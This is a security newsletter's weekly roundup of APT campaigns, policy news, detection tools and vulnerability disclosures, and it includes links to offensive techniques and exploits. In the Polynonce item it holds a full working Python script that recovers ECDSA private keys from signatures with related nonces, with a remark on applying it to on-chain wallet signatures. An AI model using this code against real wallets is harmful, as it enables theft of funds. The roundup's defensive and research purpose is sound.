

Bluepurple Pulse: week ending March 12th
Cyber breach and money laundering detection efficacy share similar root causes..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week LastPass released their ‘Recommended Actions for LastPass Business Administrators’, various router/firewall campaigns were outed, and finally a chain of Jenkins vulnerabilities leading to remote code execution was disclosed which, if exploited, could lead to excitement in various supply chains.
In the high-level this week:
Annual Threat Assessment of the US Intelligence Community - China, Russia, Iran and North Korea all get special cyber mentions, including that China “probably currently represents the broadest, most active, and persistent cyber espionage threat to U.S. Government and private-sector networks. China’s cyber pursuits and its industry’s export of related technologies increase the threats of aggressive cyber operations against the U.S. homeland, suppression of the free flow of information in cyberspace—such as U.S. web content—that Beijing views as threatening to the CCP’s hold on power, and the expansion of technology-driven authoritarianism globally.”
Russia’s Cyber Tactics: Lessons Learned in 2022 — SSSCIP analytical report on the year of Russia’s full-scale cyberwar against Ukraine - the numbers are 🤯 - 1,148 critical and high-level incidents investigated and mitigated by CERT-UA in 2022
Towards common understandings: the application of established IHL principles to cyber operations - ICRC using international law to try and drive better behaviors, this however requires countries / actors to observe/fear the consequences of said international law - ICRC legal advisers Kubo Mačák and Tilman Rodenhäuser provide concise explanations of when and how IHL – and especially its principles of humanity, necessity, distinction, and proportionality – apply to the use of information and communications technologies (ICTs) by States
They thought loved ones were calling for help. It was an AI scam - if true, evidence that criminals are using AI voice generation for fraud - His voice-cloning nightmare started when his parents received a phone call from an alleged lawyer, saying their son had killed a U.S. diplomat in a car accident. Perkin was in jail and needed money for legal fees.
USA 🇺🇸
Cybersecurity’s Third Rail: Software Liability - Some analysis on the point I highlighted last week.
Forget the regulatory red herring: Here’s what the National Cybersecurity Strategy is really telling us - While the strategy makes it clear the administration believes market forces require a regulatory push to advance this paradigm shift, the underlying message is earnest.
How will the US counter cyber threats? - The strategy’s greatest virtues might be its focus on the pressing need to grapple with market incentives driving insecurity and to reallocate responsibility for security.
EPA Cybersecurity for the Water Sector - EPA released a memorandum stressing the need for states to assess cybersecurity risk at drinking water systems to protect our public drinking water.
Health Care and Public Health Sector Cybersecurity Framework Implementation Guide Version 2 - by U.S. Department of Health and Human Services (HHS)
Australia 🇦🇺
Australian Cyber and Infrastructure Security Centre - Critical Infrastructure Resilience Plan - provides the high-level policy direction that underpins Australia’s approach to critical infrastructure resilience.
Australia demands Russia crack down on cyber criminals - They are not a rule of law country and the thought that you can apply conventional law enforcement disciplines ... is completely naive.
Inside Australian Labor’s cybersecurity overhaul - digital ID is coming to Australia - “We want all Australian businesses to be able to protect themselves but also to protect their customers,” Albanese said. “And I don’t underestimate the challenge that we’re facing. This is an ever-evolving threat and it will need adaptation from us – from business and government – to make sure that we keep on top of this.”
Getting cybersecurity right requires a change of mindset - an, in part, cutting analysis of the new strategy.
China 🇨🇳
China plans to form a national data bureau - The bureau is expected to coordinate the sharing and development of the country’s data resources, with the aim of fostering a digital economy.
Foreign govt-backed hackers 'biggest threat' to cybersecurity - says China with a straight face
Europol - Germany and Ukraine hit two high-value ransomware targets - targeted suspected core members of the criminal group responsible for carrying out large-scale cyberattacks with the DoppelPaymer ransomware.
Federal Authorities Seize Internet Domain Selling Malware Used to Illegally Control and Steal Data from Victims’ Computers - NetWire disrupted..
Spying by Mexico’s Armed Forces Brings Fears of a ‘Military State’ - human rights defenders targeted with Pegasus.
Israeli Firm Suspected of Illegally Selling Classified Spy Tech - A previously unknown Israeli cyberoffense firm is selling advanced spyware and digital surveillance technologies to foreign countries
NSO Group co-founder emerges as new majority owner - Omri Lavie – the “O” in NSO Group, who in recent years has stepped back from day-to-day management – appears to have emerged as the company’s new majority owner.
The Audit Log Wall of Shame - I’m not a fan of shaming organizations/people into doing the right thing as this does. It is mildly frustrating that security is a tax especially around audit logs. Viva Le free market… but with corporate responsibility please.
How a Montenegrin Gang Used Open-Source Intelligence to Kill - Hitmen working for a criminal group active in Montenegro and Serbia used open-source intelligence techniques, poring over apartment listing sites, satellite images, and tourist photos posted online, to track down and kill the leader of a rival clan as he hid out in Greece.
Ukraine Cyber War One Year On: An International Law Case Study - interesting conclusion - if these cyberattacks were not complementing and enabling military action on the ground, it’s likely states, international organisations and civil society actors would still be refraining from calling them out as acts of cyber war.
Reflections this week come from a meeting where money laundering detection in financial services was discussed. The thing I took away is that money laundering and cyber breach detection efficacy have similar root causes. A breach goes undetected often because of ineffective processes, capabilities, technical debt and business incentives to ensure efficacy. The reasons are quite similar to why money laundering isn’t detected in the real world.
On the interesting job/role front:
US Army Cyber & Technology Careers - fascinating times these are being advertised in this manner.
Sr. Director Analyst, Vulnerability Management and Penetration Testing at Gartner - Thanos a whole industry if you wish..
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
COBALT ILLUSION Masquerades as Atlantic Council Employee
Iran learns from North Korean tradecraft..
[We] are investigating suspicious activity reported via Twitter on February 24, 2023. Multiple individuals involved in Middle Eastern political affairs research tweeted that an individual claiming to work for the U.S. Atlantic Council think tank had contacted them about contributing to an Atlantic Council report in progress. This individual used the name Sara Shokouhi.
Multiple hallmarks of this activity suggest involvement of the Iranian COBALT ILLUSION threat group (also known as Charming Kitten, APT42, Phosphorous, TA453, and Yellow Garuda), which is suspected of operating on behalf of the Intelligence Organization of the Islamic Revolutionary Guard Corps (IRGC-IO) in Iran.
https://www.secureworks.com/blog/cobalt-illusion-masquerades-as-atlantic-council-employee
New HiatusRAT router malware covertly spies on victims
Interesting, not overly complex, but definitely a blind spot: end-of-life devices targeted by a rudimentary RAT. It is almost like our technical security debt is coming home to roost.
[We] identified another, never-before-seen campaign involving compromised routers. This is a complex campaign we are calling “Hiatus”. It infects business-grade routers and deploys two malicious binaries, including a Remote Access Trojan (RAT) we’re calling HiatusRAT, and a variant of tcpdump that enables packet capture on the target device.
The threat actors behind the Hiatus campaign primarily operationalized end-of-life DrayTek Vigor models 2960 and 3900 running an i386 architecture.
We enumerated command and control (C2) infrastructure associated with the activity and have identified at least 100 infected victims, predominately in Europe and Latin America.
https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/
Pandas with a Soul: Chinese Espionage Attacks Against Southeast Asian Government Entities
China’s latest implant framework outed. The initial access vector is basic malicious documents and social engineering.
In late 2022, a campaign with an initial infection vector similar to previous Sharp Panda operations targeted a high-profile government entity in the region.
While Sharp Panda’s previous campaigns delivered a custom and unique backdoor called VictoryDll, the payload in this specific attack is a new version of SoulSearcher loader, which eventually loads the Soul modular framework. Although samples of this framework from 2017-2021 were previously analyzed, this report is the most extensive look yet at the Soul malware family infection chain, including a full technical analysis of the latest version, compiled in late 2022.
Although the Soul malware framework was previously seen in an espionage campaign targeting the defense, healthcare, and ICT sectors in Southeast Asia, it was never previously attributed or connected to any known cluster of malicious activity. Although it is currently not clear if the Soul framework is utilized by a single threat actor, based on our research we can attribute the framework to an APT group with Chinese origins.
The connection between the tools and TTPs (Tactics, Techniques and Procedures) of Sharp Panda and the previously mentioned attacks in Southeast Asia might serve as yet another example of key characteristics inherent to Chinese-based APT operations, such as sharing custom tools between groups or task specialization, when one entity is responsible for the initial infection and another one performs the actual intelligence gathering.
Suspected Chinese Campaign to Persist on SonicWall Devices, Highlights Importance of Monitoring Edge Devices
Daniel Lee, Stephen Eckles and Ben Read detail a campaign where the initial infection vector is unknown. But given the number of vulnerabilities in this product line, and that this implant can persist over upgrades, there was/is opportunity aplenty.
[We have] identified a suspected Chinese campaign that involves maintaining long term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades.
https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall
Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials
Lukas Stefanko details a Pakistani campaign against India as well as against Pakistan’s own citizens. Again a mobile capability disguised as a chat application in order to engage in romantic discourse. The scale of the victims is interesting, let alone the legal basis on which ESET accessed said data.
This Transparent Tribe campaign mainly targets Indian and Pakistani citizens, possibly those with a military or political background.
It distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp; the backdoor can exfiltrate any sensitive information from its victims’ devices.
These trojanized apps were available to download from websites posing as official distribution centers. We believe a romance scam was used to lure targets to these websites.
Poor operational security around these apps exposed user PII, allowing us to geolocate 150 victims.
CapraRAT was hosted on a domain that resolved to an IP address previously used by Transparent Tribe.
APT-C-56 (Transparent Tribe) Deploys Android System RlmRat, Linux System Poseidon New Component Disclosure
Chinese reporting on Pakistani capability, including its multi-platform tooling. The continued evolution and diversification away from Windows endpoints appears to be an increasing trend.
[We] have discovered new attack tools targeting Android, Windows, and Linux systems while tracking a mobile attack against India. Based on the attack methods, the targets of the attack and the traceability of the Windows attack tools, we attribute this attack to Transparent Tribe.
In this attack, Transparent Tribe used phishing pages disguised as the Indian National Scholarship Portal, the Indian Army Welfare Education Society, etc. to steal specific user information. At the same time, information theft is carried out with the help of new attack tools for Android, Windows, and Linux systems, of which the Windows tool comes in two versions.
North Korea
Various bits of reporting on the Hermit Kingdom this week.
Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970
The fake job campaigns and social engineering continue unabated. Word documents and macros are the order of the day.
[We have] been tracking a campaign targeting Western Media and Technology companies from a suspected North Korean espionage group tracked as UNC2970. In June 2022, during this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. [We] suspect UNC2970 specifically targeted security researchers in this operation. Following the identification of this campaign, [we] responded to multiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a job recruitment theme and demonstrated advancements in the group’s ability to operate in cloud environments and against Endpoint Detection and Response (EDR) tools.
UNC2970 is suspected with high confidence to be UNC577, also known as Temp.Hermit. UNC577 is a cluster of North Korean cyber activity that has been active since at least 2013. The group has significant malware overlaps with other North Korean operators and is believed to share resources, such as code and complete malware tools with other distinct actors. While observed UNC577 activity primarily targets entities in South Korea, it has also targeted other organizations worldwide.
https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970
Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW
Glorious reporting here on North Korean capability which uses various techniques and environment guard rails to thwart detection and analysis. Shows sophistication and understanding.
LIGHTSHIFT is an in-memory-only dropper. The LIGHTSHIFT dropper distributes a payload that Mandiant refers to as LIGHTSHOW.
LIGHTSHOW is a utility that makes use of two primary anti-analysis techniques used to hinder both dynamic and static analysis. To deter static analysis, LIGHTSHOW was observed being packed by VM-Protect. In an effort to thwart dynamic analysis, LIGHTSHOW is targeted to a specific host and requires a specific SHA256 hash corresponding to a specific computer name or the sample will not fully execute.
https://www.mandiant.com/resources/blog/lightshift-and-lightshow
RedEyes(ScarCruft) - 2023 CHM malware impersonating security mail of a domestic financial company
A light technical analysis of malicious .chm files in use by North Korea. Most organizations should be resilient against this means of delivery.
[We] detected the distribution of CHM malware, which is believed to have been created by the RedEyes attack group (also known as APT37, ScarCruft), to domestic users.
CHM malware (Kimsuky) disguised questionnaires related to North Korea
Another team from North Korea appear to have adopted similar tradecraft. It is like they had a lunch and learn on offensive tradecraft. Note the use of password protected archives, as we have seen elsewhere.
[We] recently identified CHM malware that is presumed to have been produced by the Kimsuky group. The malware type is the same as the malware introduced in the ASEC blog and the Kimsuky group dissemination malware analysis report below, and aims to leak user information.
CHM files are distributed as attachments to e-mails in the form of compressed files. The original mail was disguised as a request for an interview about North Korea, and if the mail recipient accepts it, a compressed file with a password set is attached in reply.
Understanding the Context of Cyber Threats: Lessons from the Kimsuky Group Attack
Seongsu Park details a historic campaign from North Korea. It is described as sophisticated, though note the initial access tradecraft is malicious documents.
In early 2022, the Kimsuky group carried out a sophisticated cyber attack against defense, political, and North Korea-related individuals. The attack had a complicated infection process from the initial infection to exfiltration, and each stage shows the following characteristics:
Hacking attempts found impersonating reporters from the Unification and Foreign Affairs desk of KBS
Mok Yongjae (Seoul) details a campaign where media was impersonated.
A hacking attempt was made by impersonating a reporter for KBS, the public broadcaster in Korea. It was assessed to be the work of North Korea.
On the 7th, a number of people working in North Korea-related fields received an e-mail purporting to come from a reporter on the Unification and Foreign Affairs desk of KBS's news division.
Multi-Year Spearphishing Campaign Targets the Maritime Industry Likely for Financial Gain
Update on a historic campaign which is targeting the maritime industry with criminal intent. The campaign is using malicious attachments over email..
In May 2020 [we] published a report on phishing lures impersonating the maritime industry. This research offers new insights and update on the topic. The key takeaways of this research are:
A single threat cluster is conducting a campaign that is almost certainly targeting the maritime industry to deliver remote access trojans (RATs).
The campaign is likely financially motivated.
It is likely the maritime industry will continue to be targeted with more convincing spearphishing emails in the long term due to the readily available information about maritime vessels and the nature of the industry.
The campaign’s first spearphishing email was observed on the 21st of October 2020 against a shipping company headquartered in Norway. The spearphishing email had a CAB file attached using the name of a maritime vessel in its filename. The CAB file contained a Windows executable file, which contained the executable for the RAT Agent Tesla.
PlugX malware being distributed as a vulnerability attack
South Korean reporting here. We could discuss who knew of these vulnerabilities in Chinese remote control applications given the disclosure requirements in China. Interesting they are being exploited in this way by apparently various actors using numerous implant frameworks.
[We] recently confirmed that PlugX malware is being installed through remote code execution vulnerability attacks on Sunlogin and AweSun, Chinese remote control programs.
Sunlogin's remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) has been used in various attacks since the exploit code was released until recently. In the past, ASEC has disclosed in its blog that Sliver C2, XMRig coin miner and Gh0st RAT malware are being distributed through the Sunlogin RCE vulnerability. For reference, Gh0st RAT is also a malware developed in China, so it is a RAT malware mainly used by Chinese-based attackers.
AweSun is also a remote control program developed in China. Although specific vulnerabilities have not been confirmed, it is estimated that RCE vulnerabilities similar to Sunlogin have been disclosed. The same attackers also used the RCE exploit against AweSun as well as Sunlogin to install Sliver C2. Later, cases of installing Paradise ransomware using the same vulnerability attacks were also confirmed and disclosed on the blog.
The Cookies Parasite
Amir Shaked provides a cast iron example of a growing threat. This is where actors steal active session cookies in order to bypass the likes of MFA. How we mitigate this threat beyond backend analytics doing impossible journey tests is unclear to me right now.
The malware sends all browsers’ active cookies, and specifically looks for the following passwords and tokens: AutoFill, Passwords, Cookies, Cards, Atomic, Armory, Bytecoin, BitcoinCore, DashCore, Litecoin, Electrum, Zcash, Ethereum, Authy (2FA), FileZilla, NordVPN, Telegram, Discord, PSI, Wallet, Pidgin, Steam.
Malvertising in Google search results delivering stealers
Victoria Vlasova provides further insight into a topic I’ve discussed on numerous occasions over the past couple of months. We can expect other threat actors to a) learn and b) target similar eco-systems/mechanisms on other platforms.
In recent months, we observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, were abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines. They seem to use the same technique of mimicking a website associated with well-known software like Notepad++ and Blender 3D.
https://securelist.com/malvertising-through-search-engines/108996/
“StreamJacking” - Hijacking Hundreds of YouTube Channels Per Day Propagating Elon Musk Branded
Nati Tal details a threat I wasn’t familiar with and the fact that as-a-Service exists shows there is demand. It is an interesting dimension to criminal activity online.
“StreamJacking” is the latest evolution of a crypto scam circulating for several years now, this time as a complex campaign with hundreds of YouTube channels hijacked each day, pushing fake streams and scam pages that snitch Millions of USD worth of crypto funds in a pro-level of crypto laundering operation.
In this write-up, we will shine a light on YouTube channel hijacking As-A-Service, all without any significant response from YouTube and a lifetime of work by high-profile YouTubers with millions of followers lost for good.
Discovery
How we find and understand the latent compromises within our environments.
Using Memory Analysis to Detect EDR-Nullifying Malware
Paul Rascagneres details how to use memory forensics to detect actor tradecraft which is used to disable EDR. Really robust and useful tradecraft here.
https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/
Azure Command Line Forensics - Host Based Artifacts
Lina Lau details how to extract forensic artefacts that allow the detection of misuse of tooling on AD FS and AD CS servers to abuse pass-through authentication or identity federation.
https://www.inversecos.com/2023/03/azure-command-line-forensics-host-based.html
sherl0ck: Search email
Ben Wildee has released some awesome automation to allow you to discover content across email at scale irrespective of language.
Search an entire directory of .eml email files for a word or phrase... in over 100 languages. You input the search phrase and it translates to the language you choose BEFORE searching to match the email language.
https://github.com/pronsSec/sherl0ck
ChopChopGo: Rapidly Search and Hunt through Linux Forensics Artifacts
Christian Magana brings an uplift in tradecraft for Linux threat hunting.
ChopChopGo inspired by Chainsaw utilizes Sigma rules for forensics artifact recovery, enabling rapid and comprehensive analysis of logs and other artifacts to identify potential security incidents and threats on Linux.
https://github.com/M00NLIG7/ChopChopGo
ETW Integrity Hunting Tip: Microsoft-Windows-Security-Auditing publisher
John Dwyer shows how you can hunt for where ETW may have been interfered with. Hunting for this could be fruitful / terrifying if you get a hit.
One thing that I stumbled upon which I haven't seen before was if I messed with the registry key associated with the Microsoft-Windows-Security-Auditing publisher, I could stop the security log from logging those pesky 4688s and 4624s even after a reboot without disabling the EventLog Service. In this case, our detection opportunity is now EID 1108 and 1107 (depending on the version of Windows) in the Security log.
So if you find those EIDs in your environment, check the Security publisher registry key and make sure it hasn't been tampered with. Happy hunting, fam!
Defence
How we proactively defend our environments.
WDAC blocking policy for Mandiant-mentioned BYOVD drivers
Will Dormann continues to evidence why Microsoft should just pay him a lot of money and have him come work for them. He has taken the Mandiant reporting and converted it into a Windows Defender Application Control (WDAC) driver blocking policy.
gist.github.com/wdormann/f2daf3d503306bb4a974bef6911e7ee5
Vulnerability
Our attack surface.
SonicOS SSLVPN Improper Restriction of Excessive MFA Attempts Vulnerability
Only CVSS 4.3 - so won’t be fixed in most places
SonicOS SSLVPN improper restriction of excessive MFA attempts vulnerability allows an authenticated attacker to use excessive MFA codes.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0005
IBM HTTP Server shipped with IBM WebSphere Remote Server
CVE-2022-28331, CVE-2022-36760, CVE-2022-37436, CVE-2022-25147, CVE-2006-20001 with no workarounds for vulnerabilities such as
Apache HTTP Server is vulnerable to HTTP request smuggling, caused by an inconsistent interpretation of HTTP Requests vulnerability in mod_proxy_ajp. An attacker could exploit this vulnerability to smuggle requests to the AJP server it
https://www.ibm.com/support/pages/node/6959691
Jenkins Server RCE
Chained vulnerabilities which open the door to various supply chain attacks if exploited, due to CI/CD environment access.
[We] have discovered a chain of vulnerabilities, dubbed CorePlague, in the widely used Jenkins Server and Update Center (CVE-2023-27898, CVE-2023-27905). Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim's Jenkins server, potentially leading to a complete compromise of the Jenkins server.
https://blog.aquasec.com/jenkins-server-vulnerabilities
A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm
Nicky Mouha and Christopher Celi detail an implementation flaw.
This paper describes a vulnerability in several implementations of the Secure Hash Algorithm 3 (SHA-3) that have been released by its designers. The vulnerability has been present since the final-round update of Keccak was submitted to the National Institute of Standards and Technology (NIST) SHA-3 hash function competition in January 2011, and is present in the eXtended Keccak Code Package (XKCP) of the Keccak team. It affects all software projects that have integrated this code, such as the scripting languages Python and PHP Hypertext Preprocessor (PHP).
https://eprint.iacr.org/2023/331
Polynonce: A Tale of a Novel ECDSA Attack and Bitcoin Tears
Nils Amiet details an attack and identifies in-the-wild exploitation.
In a nutshell, the attack looks at the fact that you can always define a recurrence relation among nonces used in different ECDSA signatures as a polynomial of arbitrarily high degree, with unknown coefficients, modulo the order of the curve’s generator point.
..
Although we didn’t recover Satoshi’s private key (we’d be throwing a party instead of writing this blog post), we could see evidence that someone had previously attacked vulnerable wallets with a different exploit and drained them
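To make the nonce-recurrence idea concrete, here is an added worked example of mine (not code from the Polynonce authors or Kudelski Security) covering the simplest instance: four secp256k1 signatures whose nonces satisfy a hidden first-degree relation k[i+1] = a·k[i] + b. Writing every nonce as a linear function of the private key d turns that relation into a quadratic in d which the attacker can solve without ever learning a or b; the public key then picks the correct root. The curve arithmetic, the signer, the flawed nonce generator and the messages are all constructed for the demonstration; against real wallets you would take r, s and the message hashes from on-chain signatures instead.

```python
"""Added example, not code from the Polynonce paper or Kudelski Security.
Recover an ECDSA private key from four signatures whose nonces obey a hidden
first-degree recurrence k[i+1] = a*k[i] + b (mod n), the simplest case of the
polynomial relation described in the post. Curve: secp256k1. The signer, the
flawed nonce generator and the messages are all constructed here."""
import hashlib
import secrets

# secp256k1 domain parameters (standard constants).
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def _add(A, B):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if A is None:
        return B
    if B is None:
        return A
    (x1, y1), (x2, y2) = A, B
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if A == B:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def _mul(k, Q):
    """Double-and-add scalar multiplication."""
    R = None
    while k:
        if k & 1:
            R = _add(R, Q)
        Q = _add(Q, Q)
        k >>= 1
    return R

def sign(d, msg, k):
    """Textbook ECDSA with a caller-supplied nonce k; returns (h, r, s)."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    r = _mul(k, G)[0] % N
    s = pow(k, -1, N) * (h + r * d) % N
    return h, r, s

def sqrt_mod(a, p):
    """Tonelli-Shanks: x with x*x == a (mod p), p prime; None if a is a non-residue."""
    a %= p
    if a == 0:
        return 0
    if pow(a, (p - 1) // 2, p) != 1:
        return None
    q, s = p - 1, 0
    while q % 2 == 0:
        q, s = q // 2, s + 1
    z = 2
    while pow(z, (p - 1) // 2, p) != p - 1:
        z += 1
    m, c, t, r = s, pow(z, q, p), pow(a, q, p), pow(a, (q + 1) // 2, p)
    while t != 1:
        i, t2 = 0, t
        while t2 != 1:
            t2, i = t2 * t2 % p, i + 1
        b = pow(c, 1 << (m - i - 1), p)
        m, c, t, r = i, b * b % p, t * b * b % p, r * b % p
    return r

def recover_key(sigs, pubkey):
    """sigs: four (h, r, s) by one key whose nonces satisfy k[i+1] = a*k[i] + b
    for unknown a, b. Returns the private key(s) that match pubkey."""
    inv_s = [pow(s, -1, N) for _, _, s in sigs]
    # Each nonce is a known linear function of the unknown key: k_i = u_i + v_i*d.
    u = [h * inv % N for (h, _, _), inv in zip(sigs, inv_s)]
    v = [r * inv % N for (_, r, _), inv in zip(sigs, inv_s)]
    # Differences D_i = k_{i+1} - k_i = p_i + q_i*d satisfy D_{i+1} = a*D_i, hence
    # D_1^2 == D_0*D_2: a and b cancel, leaving a quadratic in d alone.
    p = [(u[i + 1] - u[i]) % N for i in range(3)]
    q = [(v[i + 1] - v[i]) % N for i in range(3)]
    A = (q[1] * q[1] - q[0] * q[2]) % N
    B = (2 * p[1] * q[1] - p[0] * q[2] - p[2] * q[0]) % N
    C = (p[1] * p[1] - p[0] * p[2]) % N
    root = sqrt_mod((B * B - 4 * A * C) % N, N)
    if A == 0 or root is None:
        return []  # degenerate input: the nonces do not fit a first-degree relation
    inv_2a = pow(2 * A, -1, N)
    cands = {(-B + root) * inv_2a % N, (-B - root) * inv_2a % N}
    # Two roots; the public key tells the real key from the spurious one.
    return [d for d in sorted(cands) if d and _mul(d, G) == pubkey]

def simulate(d, a, b, k1):
    """Sign four constructed messages with the hidden recurrence, then attack."""
    k = [k1 % N]
    for _ in range(3):
        k.append((a * k[-1] + b) % N)
    sigs = [sign(d, f"constructed message {i}".encode(), k[i]) for i in range(4)]
    return recover_key(sigs, _mul(d, G))

def demo():
    """Random key and random hidden (a, b): True if the attack returns exactly [d]."""
    d = secrets.randbelow(N - 1) + 1
    a, b, k1 = secrets.randbelow(N), secrets.randbelow(N), secrets.randbelow(N - 1) + 1
    return simulate(d, a, b, k1) == [d]

if __name__ == "__main__":
    print("private key recovered:", demo())
```

Run it and `demo()` reports whether the randomly generated key was recovered. A higher-degree recurrence needs more signatures and yields a higher-degree polynomial in d, which is where the paper's general treatment (and root-finding over the field) comes in; the linear case above only needs a modular square root, which is the point: the attacker never learns the RNG's coefficients, only that some low-degree relation exists.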
Offense
Attack capability, techniques and trade-craft.
Building a Password Recovery Queue
Oleg Afonin starts to outline optimization strategies for password attacks which is a really fascinating area.
In this article we’ll discuss the process of building a password recovery queue. Learn how to choose the appropriate workflow for the attack, the first prioritizing files with weaker protection, the second prioritizing faster and shorter attacks, and the third being a combination of the two. For your reference, we built a table to compare the relative strength of different file formats and encryption methods, helping users prioritize their attack queues.
https://blog.elcomsoft.com/2023/03/building-a-password-recovery-queue/
A Word About Dictionaries (for optimal password cracking)
Oleg Afonin follows-up with showing how to organize ones dictionaries for optimal attacks.
A dictionary can be optimized to increase the probability of finding a password at the beginning of the attack. One way to optimize a dictionary is using a specific order of word entries. For example, one may place the most commonly used words at the top of the list (e.g. English Word Frequency | Kaggle), while less frequently used words could be placed lower down the list.
https://blog.elcomsoft.com/2023/03/a-word-about-dictionaries/
Harvesting Active Directory credentials via HTTP Request Smuggling
A somewhat complex yet interesting attack. The persistent OWA stuff is the stuff of nightmares.
[We describe] an HTTP Request Smuggling (HRS) vulnerability that we identified during one of our engagements. It can be used to simulate exploiting public-facing services while gaining an initial foothold within the network of a customer. In our case it allowed us to harvest Active Directory credentials which we used to sign into Outlook Web Access (OWA) to view sensitive data.
Afterwards, this blog post will go on to describe how to gain persistent access to OWA by migrating clients to a rogue man-in-the-middle Exchange server.
https://tij.me/blog/harvesting-active-directory-credentials-via-http-request-smuggling/
Obfuscating Rubeus using Codecepticon
Pavel Tsakalidis evidences the level of protection that a lot of EDR solutions provide and frankly how fragile they are.
This post will provide a walkthrough on how to bring Rubeus' VirusTotal detections from 50/70 to 16/70 without much effort.
That’s right… commodity capability + tool == cratered.
https://www.pavel.gr/blog/obfuscating-rubeus-using-codecepticon
Having fun with KeePass2: DLL Hijacking and hooking APIs
In short it is possible, so don’t have implants on your boxes and you’ll be fine.
My goal was to see if I could find a way to intercept the Master Password of a KeePass2 database.
..
https://skr1x.github.io/keepass-dll-hijacking/
Timeroasting, trustroasting and computer spraying: taking advantage of weak computer and trust account passwords in Active Directory
Tom Tervoort gives further weight to why on-premises Active Directory should be deprecated.
Attack tool authors have so far been ignoring these accounts, as attempting to guess their passwords seemed to be a waste of time. It turns out, however, that these types of passwords always being unguessable is a false assumption in practice: there are actually several situations in which computer or trust accounts can have highly predictable passwords, and we encountered this in a number of organizational domains.
In domains where weak dollar account passwords are present, these techniques can provide new (stealthy) methods of initial access and additional avenues for lateral movement and privilege escalation within AD environment
https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf
https://github.com/SecuraBV/Timeroast
Exploitation
What is being exploited.
CVE-2023-21839: Weblogic RCE
Chinese exploit..
https://github.com/4ra1n/CVE-2023-21839
CVE-2023-21768: LPE exploit for Windows
American exploit..
https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Capture SSL/TLS text content without CA cert using eBPF. Supports Linux/Android x86_64/Aarch64
Chinese tooling which could easily pivot / be transferred to an implant.
https://github.com/gojue/ecapture
Exphash: Identifying Malicious DLLs With Export Hashing
from Lloyd Davies giving another actor/capability tracking edge.
Export Hashing (“exphash”), inspired by imphash, is a SHA-256 hash of ordinal-ordered export names in PEs. Tracking DLLs which are used in search-order hijacking can sometimes be tricky. Due to the way that Export Hashes are calculated, we can use this to identify related malware samples. An Export Hash is a powerful way to do this, as they are relatively unique in terms of the ordinal and exported function name within the Export Address Table (EAT). I have been using this technique for a while now in my personal malware analysis pipeline, with great results!
https://blog.syscall.party/2023/03/03/introducing-exphash-for-dll-clustering
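As an added illustration of the clustering idea (not Lloyd Davies' code nor the exphash tool itself), the function below hashes an export table in ordinal order and groups samples that share a hash; the serialisation (lower-cased names, ordinal order, comma-joined, SHA-256) and the sample export lists are assumptions constructed for this example, and PE parsing is left to a library such as pefile.

```python
import hashlib
from typing import Dict, Iterable, List, Tuple

# (ordinal, name) pairs as read from a PE's Export Address Table (EAT).
Export = Tuple[int, str]


def exphash(exports: Iterable[Export]) -> str:
    """SHA-256 over export names in ordinal order.

    Serialisation assumption (not taken from the blog post): names are
    lower-cased, ordered by ordinal and joined with commas before hashing.
    Exports present by ordinal only (no name) are skipped.
    """
    ordered = sorted((ordinal, name) for ordinal, name in exports if name)
    blob = ",".join(name.lower() for _, name in ordered).encode("utf-8")
    return hashlib.sha256(blob).hexdigest()


# Constructed sample: a trimmed export list modelled on a version-info DLL.
LEGIT_DLL: List[Export] = [
    (1, "GetFileVersionInfoA"),
    (2, "GetFileVersionInfoSizeA"),
    (3, "VerQueryValueA"),
]
# A DLL planted for search-order hijacking has to reproduce the legitimate
# exports (usually as forwarders) or the loader fails to resolve imports, so
# its EAT names and ordinals match even though its code does not.  Listing
# order in the file is irrelevant; only the ordinal order counts.
PROXY_DLL: List[Export] = [
    (3, "VerQueryValueA"),
    (1, "GetFileVersionInfoA"),
    (2, "GetFileVersionInfoSizeA"),
]
# An unrelated DLL with a different export surface.
OTHER_DLL: List[Export] = [(1, "DllRegisterServer"), (2, "DllUnregisterServer")]


def cluster(samples: Dict[str, List[Export]]) -> Dict[str, List[str]]:
    """Group sample names by exphash; a shared hash flags an identical EAT layout."""
    groups: Dict[str, List[str]] = {}
    for name, exports in samples.items():
        groups.setdefault(exphash(exports), []).append(name)
    return groups


if __name__ == "__main__":
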